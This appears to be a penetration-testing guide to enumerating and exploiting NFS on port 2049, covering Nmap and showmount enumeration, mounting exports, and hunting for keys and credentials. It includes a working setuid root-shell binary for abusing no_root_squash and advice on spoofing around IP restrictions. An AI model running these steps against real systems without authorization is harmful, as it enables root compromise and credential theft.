NFS Service - Port 2049

Basic info

The Network File System (NFS) allows file sharing across Unix-like systems over a network. While convenient, NFS often exposes sensitive data and trust relationships due to misconfigurations or outdated security models. This guide delivers in-depth methods for discovering, analyzing, and exploiting NFS services during penetration testing engagements.

Identifying NFS Services During Network Reconnaissance

Port Scanning and Service Enumeration

NFS uses the following ports:

  • TCP/UDP 2049 – NFS Service

  • TCP/UDP 111 – Portmapper (rpcbind)

Run a detailed Nmap scan:

nmap -sV -sT -p 111,2049 --script=nfs-showmount,nfs-ls,nfs-statfs <target-ip>

Check for exposed mount points and exports.


Enumerating NFS Exports

Using showmount

Check accessible NFS shares:

showmount -e <target-ip>

Example output:

Export list for 10.0.0.1:
/home           *
/var/nfs        192.168.0.0/24
  • * means accessible from any host

  • CIDR indicates trusted networks

Bypassing IP-based Access Controls

Use spoofed IP addresses or proxy from allowed subnets. In some cases, a misconfigured DNS resolution can allow access even if IP-based restrictions are in place.


Mounting NFS Shares and Privilege Analysis

Mounting an Export Locally

mkdir /mnt/nfs
mount -t nfs <target-ip>:/home /mnt/nfs

Check for files with improper permissions or user credentials.

UID/GID Mappings and Root Squashing

By default, NFS applies root squashing: remote root becomes nfsnobody. Check /etc/exports configuration for no_root_squash option:

/home *(rw,sync,no_root_squash)

If no_root_squash is set, root access is preserved, allowing privilege escalation.


Exploiting no_root_squash for Remote Code Execution

Step-by-Step Attack

  1. Create a SUID Binary on Mounted Share

    echo -e '#include <stdio.h>\n#include <stdlib.h>\n#include <unistd.h>\nint main(){setuid(0); system("/bin/bash");}' > rootsh.c
    gcc rootsh.c -o rootsh
    chmod +s rootsh
    mv rootsh /mnt/nfs/
  2. Trigger Execution on Target If the NFS share is mounted by a target system, wait for the binary to sync and then trigger execution through a scheduled task or user login.

  3. Gain Shell with Root Privileges


Enumerating and Extracting Sensitive Files

Commands to Discover Valuable Files

find /mnt/nfs -type f -name "*.conf"
find /mnt/nfs -type f -name "*.pem"
find /mnt/nfs -type f -perm -4000

Look for:

  • SSH private keys

  • Database credentials

  • Password backup files

  • Misconfigured .bashrc, .profile, or crontabs


Last updated

Was this helpful?